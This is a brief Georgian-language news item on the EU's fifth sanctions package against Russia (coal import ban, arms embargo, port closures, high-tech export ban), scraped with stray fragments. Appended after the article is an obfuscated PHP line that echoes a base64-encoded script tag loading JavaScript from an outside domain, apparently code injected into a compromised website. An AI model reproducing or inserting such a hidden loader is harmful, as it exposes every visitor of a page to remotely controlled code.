celsiusi
ავერსი შნაიდერი
ევროკავშირმა უკრაინაში შეჭრის გამო, რუსეთის წინააღმდეგ დაწესებული სანქციების მეხუთე პაკეტი დაამტკიცა. ამის შესახებ ინფორმაციას CNN-ი საფრანგეთის განცხადენაზე დაყრდნობით ავრცელებს, რომელიც ევროპის საბჭოს თავმჯდომარე ქვეყანაა.
 
გამოცემის ინფორმაციით, ახალი პაკეტი რუსული ქვანახშირის იმპორტის აკრძალვასა და რუსეთში იარაღის ექსპორტზე ემბარგოს მოიცავს. ასევე, სანქციები ითვალისწინებს რუსული გემებისთვის, ევროკავშირის პორტების დახურვასა და მაღალტექნოლოგიური პროდუქტების მოსკოვში ექსპორტის აკრძალვას.
 
როგორც გამოცემა იუწყება, სამართლებრივი ტექსტი, რომელიც მოიცავს ,,ოლიგარქების, რუსული პროპაგანდის მონაწილეების, უსაფრთხოებისა და სამხედრო აპარატის წევრების, სამრეწველო და ტექნოლოგიური სექტორის ერთეულების სახელებს" ოფიციალურად ხვალ გამოქვეყნდება.
897
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");